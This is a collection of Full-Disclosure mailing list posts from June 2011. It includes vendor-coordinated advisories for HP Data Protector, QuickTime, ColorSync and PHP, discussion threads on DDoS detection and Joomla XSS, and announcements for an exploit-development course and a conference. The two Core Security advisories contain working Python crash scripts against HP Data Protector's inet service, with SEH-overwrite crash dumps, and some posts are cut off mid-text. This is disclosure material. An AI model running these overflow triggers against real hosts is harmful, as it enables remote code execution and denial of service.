Re: [Full-disclosure] how to detect DDoS attack through HTTP response analysis(throuput)
2011/6/29 김무성 : > You don't understand my question. > > I'm studying and researching about solution of DDoS detection through > analysis of HTTP responses... i implied that this is less than useful on actual systems than in theory / lab. if you want to gather useful details you need to instrument analysis of HTTP requests/responses individually - just culling logs or counting netflows won't cut it. for example, measuring long requests at a front-end proxy (haproxy, nginx, other) separate from measuring the application request/response relayed to backend. measuring SSL session establishment, resumption separate from HTTP requests within that session. measuring TCP congestion control over which HTTP requests are sent. etc, etc... the list of papers / sources covering large-scale network and application performance tuning for the web is too large to list here. good luck! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] how to detect DDoS attack through HTTP response analysis(throuput)
You don't understand my question. I'm studying and researching about solution of DDoS detection through analysis of HTTP responses. For example, If only one response is detected several times, this is abnormal. -Original Message- From: coderman [mailto:coder...@gmail.com] Sent: Wednesday, June 29, 2011 12:30 PM To: 김무성 Cc: full-disclosure@lists.grok.org.uk; pen-t...@securityfocus.com Subject: Re: [Full-disclosure] how to detect DDoS attack through HTTP response analysis(throuput) 2011/6/26 김무성 : > ... > I'm looking for meterials or information, research about that how to detect > DDoS attack through HTTP response analysis(throuput). you're asking the wrong question. instead of asking "How can I automagically detect exploitation of my shitty app via HTTP Resp. codes" ask: "Why is my webapp so shitty that any number of arbitrary requests lead to resource exhaustion?" ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2011-0606: HP Data Protector EXEC_CMD Buffer Overflow Vulnerability
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Core Security Technologies - Corelabs Advisory
http://corelabs.coresecurity.com/
HP Data Protector EXEC_CMD Buffer Overflow Vulnerability
1. *Advisory Information*
Title: HP Data Protector EXEC_CMD Buffer Overflow Vulnerability
Advisory ID: CORE-2011-0606
Advisory URL:
http://www.coresecurity.com/content/HP-Data-Protector-EXECCMD-Vulnerability
Date published: 2011-06-29
Date of last update: 2011-06-29
Vendors contacted: HP
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Remote stack overflow [CWE-120]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2011-1866
3. *Vulnerability Description*
HP Data Protector [1] is an automated backup and recovery software for
single-server to enterprise environments. A vulnerability in HP Data
Protector could allow a remote attacker to execute arbitrary code. The
vulnerability is triggered by sending a request to port of a host
running the "data protector inet" service, part of HP Data Protector.
4. *Vulnerable packages*
. HP OpenView Storage Data Protector v6.20 (running on Windows).
. HP OpenView Storage Data Protector v6.11 (running on Windows).
. HP OpenView Storage Data Protector v6.10 (running on Windows).
. HP OpenView Storage Data Protector v6.00 (running on Windows).
. Previous versions may be affected, but were not tested.
5. *Non-vulnerable packages*
. No fixes are available at the time of publication.
6. *Vendor Information, Solutions and Workarounds*
HP has issued a security bulletin with document ID c02872182 [2]
available through HP Support Center at http://www.hp.com/go/HPSC.
The latest version of HP Data Protector is vulnerable to this issue. HP
has provided the following procedure to mitigate this vulnerability:
1. Upgrade to Data Protector A.06.20 or subsequent.
2. Enable encrypted control communication services on cell server and
all clients in cell.
The upgrade is available for download from
http://hp.com/go/dataprotector then under 'Product Information' click on
'Trials and Demos'.
7. *Credits*
This vulnerability was discovered and researched by Nahuel C. Riva from
Core Security Technologies. Publication was coordinated by Carlos Sarraute.
8. *Technical Description / Proof of Concept Code*
The following python script can be used to reproduce the bug.
/-
import sys
import socket
from struct import pack
ip = sys.argv[1]
port = int(sys.argv[2]) # default tcp port
target = (ip, port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(target)
path = 'A' * 5000
packet = pack('H', 0x0020)
packet += pack('H', 0x0020)
packet += pack('>H', 0x0020) * 4
packet += pack('H', 0x0020)
packet += path
packet += pack('>H', 0x)
plen = pack('>L', len(packet))
s.send(plen + packet)
- -/
By executing this script, the omniinet.exe process crashes in the
following EIP:
/-
7C8285D38B0424 MOV EAX,DWORD PTR SS:[ESP]
7C8285D68BE5 MOV ESP,EBP
7C8285D85D POP EBP
7C8285D9C3 RETN
- -/
This is part of a function inside the ntdll.dll library, however, if we
look the SEH chain, we can see that the SEH handler was overwritten with
the value 0x00410041 (the unicode value for "AA"):
/-
SEH chain of thread 0578
AddressSE handler
009AFF94 omniinet.00410041
00410041 A3004472
- -/
The following are the values of the CPU registers at the time of the
crash:
/-
EAX C008
ECX 009AEC98
EDX 7C82859C ntdll.KiRaiseUserExceptionDispatcher
EBX 0015B480
ESP 009AEC44
EBP 009AEC94
ESI 00155A80
EDI
EIP 7C8285D3 ntdll.7C8285D3
C 0 ES 0023 32bit 0()
P 1 CS 001B 32bit 0()
A 0 SS 0023 32bit 0()
Z 0 DS 0023 32bit 0()
S 0 FS 003B 32bit 7FFDB000(FFF)
T 0 GS NULL
D 0
O 0 LastErr ERROR_SUCCESS ()
EFL 0206 (NO,NB,NE,A,NS,PE,GE,G)
ST0 empty 0.0
ST1 empty 0.0
ST2 empty 0.0
ST3 empty 0.0
ST4 empty 0.0
ST5 empty 0.0
ST6 empty 0.7610098
ST7 empty 1.000
3 2 1 0 E S P U O Z D I
FST 4020 Cond 1 0 0 0 Err 0 0 1 0 0 0 0 0 (EQ)
FCW 027F Prec NEAR,53 Mask1 1 1 1 1 1
- -/
The problem is in the 0041D170 function. This function does a blind
copy of the string passed in the packet as a path:
/-
0041D170 /$ 55 PUSH EBP
0041D171 |. 8BEC MOV EBP,ESP
0041D173 |. 51 PUSH ECX
0041D174 |. 8B45 08MOV EAX,DWORD PTR SS:[EBP+8]
0041D177 |. 8945 FCMOV DWORD PTR SS:[EBP-4],EAX
0041D17A |. 8B4D 08MOV ECX,DWORD PTR SS:[EBP+8]
0041D17D |. 0FB711 MOVZX EDX,WORD PTR DS:[ECX]
0041D180 |. 85D2 TEST EDX,EDX
0041D182 |. 74 73 JE SHORT omniinet.0041D1F7
[...]
0041D1F7 |> 8B45 0C/MOV EAX,DWORD PTR SS:[EBP+C]
0041D1FA |. 0FB708 |MOVZX ECX,
[Full-disclosure] CORE-2011-0514: Multiple vulnerabilities in HP Data Protector
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Core Security Technologies - Corelabs Advisory
http://corelabs.coresecurity.com/
Multiple vulnerabilities in HP Data Protector
1. *Advisory Information*
Title: Multiple vulnerabilities in HP Data Protector
Advisory ID: CORE-2011-0514
Advisory URL:
http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities
Date published: 2011-06-29
Date of last update: 2011-06-29
Vendors contacted: HP
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Remote stack overflow [CWE-120], Null pointer dereference
[CWE-476], Improper input validation [CWE-20]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2011-1865, CVE-2011-1514, CVE-2011-1515
3. *Vulnerability Description*
HP Data Protector [1] is an automated backup and recovery software for
single-server to enterprise environments. Multiple vulnerabilities have
been found in HP Data Protector that could allow a remote attacker to
execute arbitrary code and lead to denial of service conditions. The
vulnerabilities are triggered by sending a request to port of a
host running the "data protector inet" service, part of HP Data
Protector. The request has several parameters, including an opcode. By
sending requests with specially crafted parameters, the different bugs
can be triggered.
4. *Vulnerable packages*
. HP OpenView Storage Data Protector v6.20 (running on Windows).
. HP OpenView Storage Data Protector v6.11 (running on Windows).
. HP OpenView Storage Data Protector v6.10 (running on Windows).
. HP OpenView Storage Data Protector v6.00 (running on Windows).
. Previous versions may be affected, but were not tested.
5. *Non-vulnerable packages*
. No fixes are available at the time of publication.
6. *Vendor Information, Solutions and Workarounds*
HP has issued a security bulletin with document ID c02872182 [2]
available through HP Support Center at http://www.hp.com/go/HPSC.
The latest version of HP Data Protector is vulnerable to these issues.
HP has provided the following procedure to mitigate these vulnerabilities:
1. Upgrade to Data Protector A.06.20 or subsequent.
2. Enable encrypted control communication services on cell server and
all clients in cell.
The upgrade is available for download from
http://hp.com/go/dataprotector then under 'Product Information' click on
'Trials and Demos'.
7. *Credits*
These vulnerabilities were discovered by Oren Isacson from Core Security
Technologies. Publication was coordinated by Carlos Sarraute.
8. *Technical Description / Proof of Concept Code*
The following python script can be used to reproduce the different bugs.
/-
import struct, socket, sys
target= sys.argv[1]
opcode= sys.argv[2]
string_lenght = int(sys.argv[3])
args_number = int(sys.argv[4])
long_argument = int(sys.argv[5])
def to_wc(x):
return ''.join(["%s\x00" % c for c in x] )
args = [to_wc('a')] * args_number
args[5] = to_wc(opcode)
args[long_argument] = 'a' * string_lenght
packet = ["\xff\xfe\x32\x00\x00\x00"]
for s in args:
packet.append("\x20\x00" + s + "\x00\x00")
packet = ''.join(packet)
packet = struct.pack(">L", len(packet)) + packet
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((target, ))
sock.send(packet)
- -/
In the following sections, we give the command line details to reproduce
each bug, and a brief description of the effect produced.
8.1. *Vulnerability 1. Opcodes 20 y 28.*
[CVE-2011-1865] This vulnerability can be reproduced with any of the
following commands:
"poc.py 127.0.0.1 20 1 30 13" or "poc.py 127.0.0.1 28 1 30 6"
This causes a stack overflow.
/-
007ce194 00426c52 007d 00810b48 007ce266 omniinet+0x26bf3
007ce1a8 00412a35 007ce22c 004aa900 0080edb0 omniinet+0x26c52
007cea3c 61616161 61616161 61616161 61616161 omniinet+0x12a35
61616161 0x61616161
- -/
8.2. *Vulnerability 2. Opcode 11.*
[CVE-2011-1865] This vulnerability is reproduced with the following command:
"poc.py 127.0.0.1 11 1 30 17"
A stack overflow is produced within the function swprintf, called from
position 0x00411A72.
8.3. *Vulnerability 3. Opcode 35.*
[CVE-2011-1865] This vulnerability can be reproduced with any of the
following commands:
"poc.py 127.0.0.1 35 1 30 6" or "poc.py 127.0.0.1 35 1 30 7"
A stack overflow is produced within the function swprintf, called from
position 0041367F.
8.4. *Vulnerability 4. Opcode 42.*
[CVE-2011-1865] This vulnerability is reproduced with the following command:
"poc.py 127.0.0.1 42 1 30 9"
A stack overflow is produced by calling the function swprintf from
position 0x0040A9BA.
8.5. *Vulnerability 5. Opcode 46.*
[CVE-2011-1865] This vulnerability is reproduced with the following command:
"poc.py 127.0.0.1 46 1 30 17"
A stack overflow is produced by calling the function swprintf from
positio
[Full-disclosure] ZDI-11-229: Apple QuickTime RIFF fmt Chunk Parsing Remote Code Execution Vulnerability
ZDI-11-229: Apple QuickTime RIFF fmt Chunk Parsing Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-11-229 June 29, 2011 -- CVE ID: CVE-2011-0209 -- CVSS: 7.5, (AV:N/AC:L/Au:N/C:P/I:P/A:P) -- Affected Vendors: Apple -- Affected Products: Apple Quicktime -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 11430. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within how the application parses a specially formatted RIFF WAV file. When parsing a fmt chunk within the file, the application will use a 32-bit field to calculate the size of a buffer to allocate. Before the allocation, the application will add 0x14 bytes to the result. Due to restrictions imposed on the implementation of this component by the language and it's platform, an integer overflow can be made to occur. This can lead to code execution under the context of the application. -- Vendor Response: Apple has issued an update to correct this vulnerability. More details can be found at: http://support.apple.com/kb/HT4723 -- Disclosure Timeline: 2011-04-11 - Vulnerability reported to vendor 2011-06-29 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Luigi Auriemma -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-11-228: Apple ColorSync ICC Profile ncl2 Parsing Remote Code Execution Vulnerability
ZDI-11-228: Apple ColorSync ICC Profile ncl2 Parsing Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-11-228 June 29, 2011 -- CVE ID: CVE-2011-0200 -- CVSS: 7.5, (AV:N/AC:L/Au:N/C:P/I:P/A:P) -- Affected Vendors: Apple -- Affected Products: Apple Mail Apple OS X Apple Safari -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 11426. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple Safari on Windows and multiple applications on OSX. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The flaw exists within the ColorSync component which is used when handling image files containing embedded ICC data. When handling the ncl2 tag the process miscalculates an integer value used in a memory allocation. This buffer is later used as a destination when copying user controlled data. A remote attacker can exploit this vulnerability to execute arbitrary code under the context of the user running the application. -- Vendor Response: Apple has issued an update to correct this vulnerability. More details can be found at: http://support.apple.com/kb/HT4723 -- Disclosure Timeline: 2011-04-04 - Vulnerability reported to vendor 2011-06-29 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * binaryproof -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-11-230: Apple Quicktime Apple Lossless Audio Codec Parsing Remote Code Execution Vulnerability
ZDI-11-230: Apple Quicktime Apple Lossless Audio Codec Parsing Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-11-230 June 29, 2011 -- CVE ID: CVE-2011-0211 -- CVSS: 7.5, (AV:N/AC:L/Au:N/C:P/I:P/A:P) -- Affected Vendors: Apple -- Affected Products: Apple Quicktime -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 11428. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple Quicktime. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the way Quicktime handles Apple Lossless Audio Codec streams. While parsing the sample description for the 'alac' codec an integer wrap can occur that results in the allocation of a memory buffer that is smaller than intended. When Quicktime writes to this buffer it causes a memory corruption that can lead to remote code execution under the context of the current user. -- Vendor Response: Apple has issued an update to correct this vulnerability. More details can be found at: http://support.apple.com/kb/HT4723 -- Disclosure Timeline: 2011-04-11 - Vulnerability reported to vendor 2011-06-29 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Luigi Auriemma * Damian Put -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Resolved - NNT Change Tracker - Hard-Coded Encryption Key - Originally posted as http://seclists.org/fulldisclosure/2011/May/460
As is probably obvious to other readers, I did indeed notify NNT by email of the vulnerability before making it public - as mentioned in my initial disclosue. I'm not sure what possible reason anyone would have to say that if it were not true. Glad to see you apparently did the right thing and eventually fixed it though. On Wed, Jun 29, 2011 at 3:34 PM, NNT Support wrote: > Background > - > > The product employs a portion of legacy code as referenced in the original > post. This is used for the product key and some database entries but whilst > the strength of the encryption being used here may be a problem for the NNT > licensing team, there is no genuine security risk for device data. This > portion of code has subsequently been replaced in Versions 5 and patches are > available from www.nntws.com > > Change Tracker works on the principle of layered, multi-dimensional security > in line with the PCI DSS that it is commonly used to underpin. The secure > commissioning process should include standard lockdown and > access-restriction procedures for the Change Tracker server and database > server used for device and configuration data storage. Access security > should also be complemented with monitoring using a SIEM solution such as > NNT Log Tracker, so any access to the Change Tracker server, the Change > Tracker console program or the database will be logged and alerted as > unusual activity. > > NNT take security of our customer systems extremely seriously. Anyone with > any concerns regarding best practise in Production System security should > contact us for further assistance. > > Regarding any vulnerabilities discovered by independent security researchers > in the future, we would prefer these are reported to us at supp...@nntws.com > before being published. This was not the case in this instance, delaying our > opportunity to respond. Thank you. > > Company Homepage > -- > > http://www.newnettechnologies.com > > > > Regards > > NNT Support > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-11-231: Apple QuickTime Pict File Matrix Parsing Remote Code Execution Vulnerability
ZDI-11-231: Apple QuickTime Pict File Matrix Parsing Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-11-231 June 29, 2011 -- CVE ID: CVE-2010-3790 -- CVSS: 7.5, (AV:N/AC:L/Au:N/C:P/I:P/A:P) -- Affected Vendors: Apple -- Affected Products: Apple Quicktime -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 11429. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime Player. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within how the application parses a Matrix structure within a particular opcode embedded within a .pict file. When using this Matrix structure to transform image data, the application will miscalculate an index to represent a row of an object. This will cause the application to write outside the bounds of the array of objects which can lead to code execution under the context of the application. -- Vendor Response: Apple has issued an update to correct this vulnerability. More details can be found at: http://support.apple.com/kb/HT4723 -- Disclosure Timeline: 2011-04-11 - Vulnerability reported to vendor 2011-06-29 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Subreption LLC -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 2266-1] php5 security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2266-1 secur...@debian.org http://www.debian.org/security/Moritz Muehlenhoff June 29, 2011 http://www.debian.org/security/faq - - Package: php5 Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2010-2531 CVE-2011-0420 CVE-2011-0421 CVE-2011-0708 CVE-2011-1153 CVE-2011-1466 CVE-2011-1471 CVE-2011-2202 Several vulnerabilities were discovered in PHP, which could lead to denial of service or potentially the execution of arbitrary code. CVE-2010-2531 An information leak was found in the var_export() function. CVE-2011-0421 The Zip module could crash. CVE-2011-0708 An integer overflow was discovered in the Exif module. CVE-2011-1466 An integer overflow was discovered in the Calendar module. CVE-2011-1471 The Zip module was prone to denial of service through malformed archives. CVE-2011-2202 Path names in form based file uploads (RFC 1867) were incorrectly validated. This update also fixes two bugs, which are not treated as security issues, but fixed nonetheless, see README.Debian.security for details on the scope of security support for PHP (CVE-2011-0420, CVE-2011-1153). For the oldstable distribution (lenny), this problem has been fixed in version 5.2.6.dfsg.1-1+lenny12. For the stable distribution (squeeze), this problem has been fixed in version 5.3.3-7+squeeze3. For the unstable distribution (sid), this problem has been fixed in version 5.3.6-12. We recommend that you upgrade your php5 packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iEYEARECAAYFAk4LcUoACgkQXm3vHE4uylqCbACg2vzq7Fl2cNdA22fY2PM36cjq rREAn097NPV6k3RfopU9I+WEvZGaIzpC =zfHE -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Resolved - NNT Change Tracker - Hard-Coded Encryption Key - Originally posted as http://seclists.org/fulldisclosure/2011/May/460
Background - The product employs a portion of legacy code as referenced in the original post. This is used for the product key and some database entries but whilst the strength of the encryption being used here may be a problem for the NNT licensing team, there is no genuine security risk for device data. This portion of code has subsequently been replaced in Versions 5 and patches are available from www.nntws.com Change Tracker works on the principle of layered, multi-dimensional security in line with the PCI DSS that it is commonly used to underpin. The secure commissioning process should include standard lockdown and access-restriction procedures for the Change Tracker server and database server used for device and configuration data storage. Access security should also be complemented with monitoring using a SIEM solution such as NNT Log Tracker, so any access to the Change Tracker server, the Change Tracker console program or the database will be logged and alerted as unusual activity. NNT take security of our customer systems extremely seriously. Anyone with any concerns regarding best practise in Production System security should contact us for further assistance. Regarding any vulnerabilities discovered by independent security researchers in the future, we would prefer these are reported to us at supp...@nntws.com before being published. This was not the case in this instance, delaying our opportunity to respond. Thank you. Company Homepage -- http://www.newnettechnologies.com Regards NNT Support ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Spanish] Curso gratuito: Linux exploit development - ASCII Armor Bypass Return-To-PLT
Este sábado "2 de Julio a las 11:00hs" se dictara en Castro Barros 183 1-5 ( Argentina ) el curso de 3 horas gratuito sobre seguridad informática. * En el mismo vamos a tratar el tema de desarrollo de Exploits para sistemas Linux y como utilizar la tecnica ASCII Armor Bypass Return-To-PLT y también veremos por que tecnicas como Return-To-Libc no sirven estos dias. * La asistencia es gratuita y no se requiere ningún tipo de conocimiento de bajo nivel, como siempre digo es preferible que vengan y pregunten mil veces a que no vengan y se pierdan la oportunidad de cursar. * En el mismo veremos el desarrollo de un exploit para Linux, utilizaremos un debugger y le aplicaremos Return-To-PLT para bypassear la seguridad del sistema. Porque hacemos los cursos? Porque en Argentina no existe nada parecido y menos que menos, sobre seguridad informática. Además, porque queremos desmitificar el desarrollo y conociendo a fondo como funcionan realmente y a bajo nivel nuestras computadoras es como podemos prevenir y mantenernos actualizados en el dia a dia del mundo de la seguridad sin lugar a dudas. Los esperamos este sábado, si pueden traer algo para tomar o comer serán agradecidos por el resto de los asistentes. En lo posible confirmen por email ya que el lugar no es muy grande: A jsa...@insecurityresearch.com Saludos y los esperamos! Como llegar: Subte Linea A estacion Castrobarros Te dejan el la puerta los colectivos 128 y 160 Es a 2 cuadras del bar "Las violetas" Juan Sacco ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] S3cC0n Security Conference
Dear Security researchers, S3cC0n, A Indian internet security researcher team invites you to join us on 7th, 8th, and 9th of July for the annual discloser of exploits and security researches. Last 2 year we are organizing this conference with 56 researchers. S3cC0n is proud to announce the launch of it security and hacking conference at INDIA. This conference will bring together security researchers , security professionals , vendors , Law enforcements agencies from all over the country to a common platform to discuss latest research in field of information security and in particular the major security threats faced by everyone today . S3cC0n is one of a kind of conference showcasing the latest research and trends in information security by renowned security researchers/professionals. Following topics are covered Web application – Security is not separate Cross interface attack (CIA) Web Trend – Exploited browser SQLXSS (SQL Injections XSS) Remote Code execution in Dev Document rendering attack XML authoring flow WAF Bypass Methods Web Widget interface flaw Persistent Redirection flaw Declarative security Content Delivery networks – Stringency Many More Private 0days will be disclosed in conference... Topic information with schedule of discussion topic and author name will display soon. For More details please shout mail [AT] s3c...@gmail.com Best Regards, S3cC0n Team Download PDF : http://dl.dropbox.com/u/18007092/Dear_Security_researchers.pdf ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] smallftpd <= 1.0.3-fix | Connection Saturation Remote Denial of Service Vulnerability
smallftpd <= 1.0.3-fix | Connection Saturation Remote Denial of Service Vulnerability 1. OVERVIEW The smallftpd FTP server is found to be vulnerable to denial of service in handling multiple connection requests regardless of its maximum connection settings. Upon successful DoS exploit, the smallftpd will crash or reject new FTP login requests. 2. BACKGROUND The smallftpd FTP server isis a small and simple muli-threaded ftp server for windows. 3. VERSIONS AFFECTED 1.0.3-fix and earlier 4. PROOF-OF-CONCEPT/EXPLOIT http://dev.metasploit.com/redmine/attachments/1330/smallftpd103fix_saturation.rb http://www.exploit-db.com/download/17455 5. SOLUTION The vendor has discontinued this product and therefore has no patch or upgrade that mitigates this problem. It is recommended that an alternate software package be used in its place. 6. VENDOR Arnaud Mary 7. CREDIT This vulnerability was discovered by Myo Soe, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 8. REFERENCES Original Advisory URL: http://core.yehg.net/lab/pr0js/advisories/smallftpd_103-fix_saturation_dos SmallFTPD Home Page: http://smallftpd.sourceforge.net/ SmallFTPD Download Stat: http://sourceforge.net/project/stats/?group_id=104723&ugn=smallftpd&type=&mode=alltime ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Joomla! 1.6.3 and lower | Multiple Cross Site Scripting (XSS) Vulnerabilities
On 29/06/2011 02:40, Nick FitzGerald wrote: > The kind of problems that scream "Why would anyone in their right mind > use it?" The official line. http://forum.joomla.org/viewtopic.php?f=432&t=335090 and a good example of how CVE's are handled http://forum.joomla.org/viewtopic.php?f=432&t=631398 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Joomla! 1.6.3 and lower | Multiple Cross Site Scripting (XSS) Vulnerabilities
On 29/06/2011 02:40, Nick FitzGerald wrote: > Christian Sciberras wrote: > >> Rather than that, I'd say the dev team is out of sync with the security >> team.. > > Assuming that that may be a reasonable one-sentence encapsulation of > how Joomla development is organized... > > The fact such a sentence can be meaningfully utterred tells us there > are major problems _inherent_ in Joomla. What I find worrying is that I cannot see the test suite anywhere. Have I misse dthe link, is it secret or non existent? Jacqui http://forum.joomla.org/viewtopic.php?f=681&t=624023&sid=e07f7a089ae6ca49291960fb1744de51 I would have thought they would be asking for help to migrate test into one of the free-to-use CI systems available to floss projects. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] how to detect DDoS attack through HTTP response analysis(throuput)
